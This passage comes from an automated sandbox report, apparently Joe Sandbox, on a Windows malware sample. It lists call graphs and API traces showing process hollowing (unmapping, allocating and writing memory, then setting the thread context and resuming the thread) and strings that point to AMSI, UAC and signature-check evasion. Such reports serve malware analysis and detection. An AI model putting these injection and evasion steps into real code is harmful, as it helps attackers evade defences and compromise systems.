32046->32047 32048 27e889c 22 API calls 32047->32048 32049 27ea2c3 32048->32049 32050 27d4860 11 API calls 32049->32050 32051 27ea2df 32050->32051 32052 27d47ec 11 API calls 32051->32052 32053 27ea310 32052->32053 32054 27e889c 22 API calls 32053->32054 32055 27ea334 32054->32055 32056 27d4860 11 API calls 32055->32056 32057 27ea350 32056->32057 32058 27d47ec 11 API calls 32057->32058 32059 27ea381 32058->32059 32060 27e889c 22 API calls 32059->32060 32061 27ea3a5 32060->32061 32062 27d2c2c 11 API calls 32061->32062 32063 27ea3b4 32062->32063 32064 27d4860 11 API calls 32063->32064 32065 27ea3d6 32064->32065 32066 27d47ec 11 API calls 32065->32066 32067 27ea407 32066->32067 32068 27e889c 22 API calls 32067->32068 32069 27ea42b 32068->32069 32070 27e8818 21 API calls 32069->32070 32071 27ea43f 32070->32071 32072 27e8818 21 API calls 32071->32072 32073 27ea453 32072->32073 32074 27e8818 21 API calls 32073->32074 32075 27ea467 32074->32075 32076 27d4860 11 API calls 32075->32076 32077 27ea483 32076->32077 32078 27d47ec 11 API calls 32077->32078 32079 27ea4b4 32078->32079 32080 27e889c 22 API calls 32079->32080 32081 27ea4d8 32080->32081 32082 27e8818 21 API calls 32081->32082 32083 27ea4ec 32082->32083 32084 27e8818 21 API calls 32083->32084 32085 27ea500 32084->32085 32086 27d4860 11 API calls 32085->32086 32087 27ea51c 32086->32087 32088 27d47ec 11 API calls 32087->32088 32089 27ea53a 32088->32089 32090 27e8818 21 API calls 32089->32090 32091 27ea552 32090->32091 32092 27d4860 11 API calls 32091->32092 32093 27ea56e 32092->32093 32094 27d47ec 11 API calls 32093->32094 32095 27ea58c 32094->32095 32096 27e8818 21 API calls 32095->32096 32097 27ea5a4 32096->32097 32098 27e8818 21 API calls 32097->32098 32099 27ea5b8 32098->32099 32100 27e8818 21 API calls 32099->32100 32101 27ea5cc 32100->32101 32102 27e8818 21 API calls 32101->32102 32103 27ea5e0 32102->32103 32104 27e8818 21 API calls 32103->32104 32105 27ea5f4 32104->32105 32106 27d4860 11 API calls 32105->32106 32107 27ea610 32106->32107 32108 27d47ec 11 API calls 32107->32108 32109 27ea62e 32108->32109 32110 27e8818 21 API calls 32109->32110 32111 27ea646 32110->32111 32112 27d4860 11 API calls 32111->32112 32113 27ea662 32112->32113 32114 27d47ec 11 API calls 32113->32114 32115 27ea680 32114->32115 32116 27e8818 21 API calls 32115->32116 32117 27ea698 32116->32117 32118 27d4860 11 API calls 32117->32118 32119 27ea6b4 32118->32119 32120 27d47ec 11 API calls 32119->32120 32121 27ea6d2 32120->32121 32122 27e8818 21 API calls 32121->32122 32123 27ea6ea 32122->32123 32124 27d4860 11 API calls 32123->32124 32125 27ea706 32124->32125 32126 27d47ec 11 API calls 32125->32126 32127 27ea724 32126->32127 32128 27e8818 21 API calls 32127->32128 32129 27ea73c 32128->32129 32130 27e8818 21 API calls 32129->32130 32131 27ea75b 32130->32131 32132 27e8818 21 API calls 32131->32132 32132->31746 32134 27d4530 11 API calls 32133->32134 32135 27e8227 32134->32135 32136 27d4860 11 API calls 32135->32136 32137 27e8246 32136->32137 32138 27e8098 17 API calls 32137->32138 32139 27e8259 32138->32139 32140 27e8140 15 API calls 32139->32140 32141 27e825f FlushInstructionCache 32140->32141 32142 27e8285 32141->32142 32143 27d44dc 11 API calls 32142->32143 32144 27e828d 32143->32144 32144->31647 32146 27d4530 11 API calls 32145->32146 32147 27e84ab 32146->32147 32148 27d4860 11 API calls 32147->32148 32149 27e84ca 32148->32149 32150 27e8098 17 API calls 32149->32150 32151 27e84dd 32150->32151 32152 27e8140 15 API calls 32151->32152 32153 27e84e3 WinExec 32152->32153 32154 27e8505 32153->32154 32155 27d44dc 11 API calls 32154->32155 32156 27e850d 32155->32156 32156->30982 32157->31042 32158->31199 32159->31255 32160->31372 32161->31205 32162->31299 32164 27e883f GetProcAddress 32163->32164 32165 27e8887 32163->32165 32166 27e887c FreeLibrary 32164->32166 32167 27e8859 32164->32167 32165->31495 32166->32165 32168 27e7d78 18 API calls 32167->32168 32169 27e8871 32168->32169 32169->32166 32171 27d49a4 GetModuleHandleA 32170->32171 32171->31670 32172->31705 32173->31705 32175 27d4f26 SysAllocStringLen 32174->32175 32176 27d4f3c 32174->32176 32175->32176 32177 27d4c30 32175->32177 32176->31714 32177->32174 32178->31717 32180 27d4c74 32179->32180 32181 27d4c66 SysFreeString 32179->32181 32180->31724 32181->32180 32183 27d4530 11 API calls 32182->32183 32184 27e8677 32183->32184 32185 27d4860 11 API calls 32184->32185 32186 27e8696 32185->32186 32187 27e8098 17 API calls 32186->32187 32188 27e86a9 32187->32188 32189 27e8140 15 API calls 32188->32189 32190 27e86af CreateProcessAsUserW 32189->32190 32191 27e86f3 32190->32191 32192 27d44dc 11 API calls 32191->32192 32193 27e86fb 32192->32193 32193->31817 32193->31819 32195 27d4530 11 API calls 32194->32195 32196 27e82f1 32195->32196 32197 27e798c 12 API calls 32196->32197 32198 27e82fe 32197->32198 32199 27d47ec 11 API calls 32198->32199 32200 27e830b 32199->32200 32201 27e8098 17 API calls 32200->32201 32202 27e831e 32201->32202 32203 27e8140 15 API calls 32202->32203 32204 27e8324 NtReadVirtualMemory 32203->32204 32205 27e8352 32204->32205 32206 27d4500 11 API calls 32205->32206 32207 27e835f 32206->32207 32207->31896 32207->31897 32209 27d4530 11 API calls 32208->32209 32210 27e8561 32209->32210 32211 27e798c 12 API calls 32210->32211 32212 27e856e 32211->32212 32213 27d47ec 11 API calls 32212->32213 32214 27e857b 32213->32214 32215 27e8098 17 API calls 32214->32215 32216 27e858e 32215->32216 32217 27e8140 15 API calls 32216->32217 32218 27e8594 NtUnmapViewOfSection 32217->32218 32219 27e85b4 32218->32219 32220 27d4500 11 API calls 32219->32220 32221 27e85c1 32220->32221 32221->31936 32221->31937 32223 27d4530 11 API calls 32222->32223 32224 27e7a51 32223->32224 32225 27e798c 12 API calls 32224->32225 32226 27e7a5e 32225->32226 32227 27d47ec 11 API calls 32226->32227 32228 27e7a6b 32227->32228 32229 27e8098 17 API calls 32228->32229 32230 27e7a7e 32229->32230 32231 27e8140 15 API calls 32230->32231 32232 27e7a84 NtAllocateVirtualMemory 32231->32232 32233 27e7ab5 32232->32233 32234 27d4500 11 API calls 32233->32234 32235 27e7ac2 32234->32235 32235->31973 32237 27d2c10 11 API calls 32236->32237 32238 27e8b6e 32237->32238 32238->31980 32239 27f4134 32240 27d4860 11 API calls 32239->32240 32241 27f4155 32240->32241 32242 27f4160 32241->32242 32243 27d47ec 11 API calls 32242->32243 32244 27f418c 32243->32244 32245 27d49a0 32244->32245 32246 27f4197 32245->32246 32247 27e889c 22 API calls 32246->32247 32248 27f41b0 32247->32248 32249 27d4860 11 API calls 32248->32249 32250 27f41ef 32249->32250 32251 27f41fa 32250->32251 32252 27d4860 11 API calls 32251->32252 32253 27f4227 32252->32253 32254 27d49a0 32253->32254 32255 27f4232 32254->32255 32256 27f423f 32255->32256 32257 27d47ec 11 API calls 32256->32257 32258 27f425e 32257->32258 32259 27d49a0 32258->32259 32260 27f4269 32259->32260 32261 27f4276 32260->32261 32262 27e889c 22 API calls 32261->32262 32263 27f4282 32262->32263 32264 27d4860 11 API calls 32263->32264 32265 27f42a3 32264->32265 32266 27f42ae 32265->32266 32267 27f42bb 32266->32267 32268 27d47ec 11 API calls 32267->32268 32269 27f42da 32268->32269 32270 27d49a0 32269->32270 32271 27f42e5 32270->32271 32272 27f42f2 32271->32272 32273 27e889c 22 API calls 32272->32273 32274 27f42fe 32273->32274 32275 27d4860 11 API calls 32274->32275 32276 27f431f 32275->32276 32277 27f432a 32276->32277 32278 27f4337 32277->32278 32279 27d47ec 11 API calls 32278->32279 32280 27f4356 32279->32280 32281 27d49a0 32280->32281 32282 27f4361 32281->32282 32283 27f436e 32282->32283 32284 27e889c 22 API calls 32283->32284 32285 27f437a 32284->32285 32286 27d7e5c GetFileAttributesA 32285->32286 32287 27f4384 32286->32287 32288 27f4388 32287->32288 32289 27f43e3 32287->32289 33782 27ee64c 32288->33782 32290 27d4860 11 API calls 32289->32290 32292 27f4404 32290->32292 32294 27f440f 32292->32294 32293 27f439d 33787 27d4764 32293->33787 32297 27f441c 32294->32297 32298 27d47ec 11 API calls 32297->32298 32299 27f443b 32298->32299 32301 27f4446 32299->32301 33789 27d46d4 32301->33789 33783 27d4bcc 11 API calls 33782->33783 33784 27ee664 33783->33784 33785 27ee685 33784->33785 33786 27d49f8 11 API calls 33784->33786 33785->32293 33786->33784 33788 27d476a 33787->33788 33788->33788 33790 27d46da 33789->33790

                                                                                        Executed Functions

                                                                                        Function 027E8C28 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 6027 27e8c28-27e8c2b 6028 27e8c30-27e8c35 6027->6028 6028->6028 6029 27e8c37-27e8d1e call 27d4990 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6028->6029 6060 27ea76f-27ea7d9 call 27d4500 * 2 call 27d4c60 call 27d4500 call 27d44dc call 27d4500 * 2 6029->6060 6061 27e8d24-27e8dff call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6029->6061 6061->6060 6105 27e8e05-27e912d call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d30d4 * 2 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 call 27d4df0 call 27e8654 6061->6105 6214 27e912f-27e919b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6105->6214 6215 27e91a0-27e94c1 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2ee0 call 27d2f08 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c GetThreadContext 6105->6215 6214->6215 6215->6060 6323 27e94c7-27e972a call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e82cc 6215->6323 6396 27e9a37-27e9aa3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6323->6396 6397 27e9730-27e9899 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e853c 6323->6397 6424 27e9aa8-27e9c28 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 6396->6424 6487 27e989b-27e98c1 call 27e7a2c 6397->6487 6488 27e98c3-27e992f call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6397->6488 6424->6060 6528 27e9c2e-27e9d27 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8b38 6424->6528 6497 27e9934-27e9a2b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 6487->6497 6488->6497 6567 27e9a30-27e9a35 6497->6567 6579 27e9d7b-27ea4d3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c SetThreadContext NtResumeThread call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2c2c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8818 * 3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6528->6579 6580 27e9d29-27e9d76 call 27e8a30 call 27e8a24 6528->6580 6567->6424 6805 27ea4d8-27ea76a call 27e8818 * 2 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 * 5 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27e7f4c call 27e8818 * 2 6579->6805 6580->6579 6805->6060
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027E8654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                        • GetThreadContext.KERNEL32(000005FC,0282B420,ScanString,0282B3A4,027EA7F4,UacInitialize,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,UacInitialize,0282B3A4), ref: 027E94BA
                                                                                          • Part of subcall function 027E82CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E833D
                                                                                          • Part of subcall function 027E853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 027E85A1
                                                                                          • Part of subcall function 027E7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                          • Part of subcall function 027E7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E7DEC
                                                                                        • SetThreadContext.KERNEL32(000005FC,0282B420,ScanBuffer,0282B3A4,027EA7F4,ScanString,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,000008AC,00203FF8,0282B4F8,00000004,0282B4FC), ref: 027EA1CF
                                                                                        • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005FC,00000000,000005FC,0282B420,ScanBuffer,0282B3A4,027EA7F4,ScanString,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,000008AC,00203FF8,0282B4F8), ref: 027EA1DC
                                                                                          • Part of subcall function 027E8818: LoadLibraryW.KERNEL32(bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize,0282B3A4,027EA7F4,UacScan), ref: 027E882C
                                                                                          • Part of subcall function 027E8818: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 027E8846
                                                                                          • Part of subcall function 027E8818: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000005FC,00000000,0282B3A4,027EA43F,ScanString,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,Initialize), ref: 027E8882
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856664499.00000000027FE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856781611.000000000282B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.000000000291F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.1856845568.0000000002922000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_27d0000_x.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$MemoryThreadVirtual$AddressContextFreeLoadProc$AllocateCreateHandleModuleProcessReadResumeSectionUnmapUserViewWrite
                                                                                        • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                        • API String ID: 4083799063-51457883
                                                                                        • Opcode ID: 3d4b60e071a62e065c0e39399744be5a44f9edddfdb193ccf66416e22ef8ab30
                                                                                        • Instruction ID: 66f1110e47c72c8bd53e8730a751647debf5190d21488ec845ae315226cac4ff
                                                                                        • Opcode Fuzzy Hash: 3d4b60e071a62e065c0e39399744be5a44f9edddfdb193ccf66416e22ef8ab30
                                                                                        • Instruction Fuzzy Hash: 76E21579A4015A9FDF12EB54DDA6BCE73B6EF89300F1041B1900AAB214DF34AE95CF61
                                                                                        Function 027E8C26 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 6883 27e8c26-27e8c2b 6885 27e8c30-27e8c35 6883->6885 6885->6885 6886 27e8c37-27e8d1e call 27d4990 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6885->6886 6917 27ea76f-27ea7d9 call 27d4500 * 2 call 27d4c60 call 27d4500 call 27d44dc call 27d4500 * 2 6886->6917 6918 27e8d24-27e8dff call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6886->6918 6918->6917 6962 27e8e05-27e912d call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d30d4 * 2 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4de0 call 27d4df0 call 27e8654 6918->6962 7071 27e912f-27e919b call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 6962->7071 7072 27e91a0-27e94c1 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d46d4 * 2 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2ee0 call 27d2f08 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c GetThreadContext 6962->7072 7071->7072 7072->6917 7180 27e94c7-27e972a call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e82cc 7072->7180 7253 27e9a37-27e9aa3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 7180->7253 7254 27e9730-27e9899 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e853c 7180->7254 7281 27e9aa8-27e9c28 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 7253->7281 7344 27e989b-27e98c1 call 27e7a2c 7254->7344 7345 27e98c3-27e992f call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c 7254->7345 7281->6917 7385 27e9c2e-27e9d27 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8b38 7281->7385 7354 27e9934-27e9a35 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7a2c 7344->7354 7345->7354 7354->7281 7436 27e9d7b-27ea76a call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e7d78 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c SetThreadContext NtResumeThread call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27d2c2c call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8818 * 3 call 27d4860 call 27d49a0 call 27d46d4 call 27d47ec call 27d49a0 call 27d46d4 call 27e889c call 27e8818 * 2 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 * 5 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27d4860 call 27d49a0 call 27d47ec call 27d49a0 call 27e8818 call 27e7f4c call 27e8818 * 2 7385->7436 7437 27e9d29-27e9d76 call 27e8a30 call 27e8a24 7385->7437 7436->6917 7437->7436
                                                                                        APIs
                                                                                          • Part of subcall function 027E889C: LoadLibraryA.KERNEL32(00000000,00000000,027E8983), ref: 027E88D0
                                                                                          • Part of subcall function 027E889C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,027E8983), ref: 027E88E0
                                                                                          • Part of subcall function 027E889C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 027E88F9
                                                                                          • Part of subcall function 027E889C: FreeLibrary.KERNEL32(74AE0000,00000000,0282B388,Function_0000662C,00000004,0282B398,0282B388,000186A3,00000040,0282B39C,74AE0000,00000000,00000000,00000000,00000000,027E8983), ref: 027E8963
                                                                                          • Part of subcall function 027E8654: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 027E86E0
                                                                                        • GetThreadContext.KERNEL32(000005FC,0282B420,ScanString,0282B3A4,027EA7F4,UacInitialize,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,ScanBuffer,0282B3A4,027EA7F4,UacInitialize,0282B3A4), ref: 027E94BA
                                                                                          • Part of subcall function 027E82CC: NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 027E833D
                                                                                          • Part of subcall function 027E853C: NtUnmapViewOfSection.NTDLL(?,?), ref: 027E85A1
                                                                                          • Part of subcall function 027E7A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 027E7A9F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.1856563852.00000000027D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 027D0000, based on PE: true
                                                                                        • Associated: 00000001.00000002.1856538459.00000000027D0000.00000002.00001000.00020000.00000000.sdmpDownload File
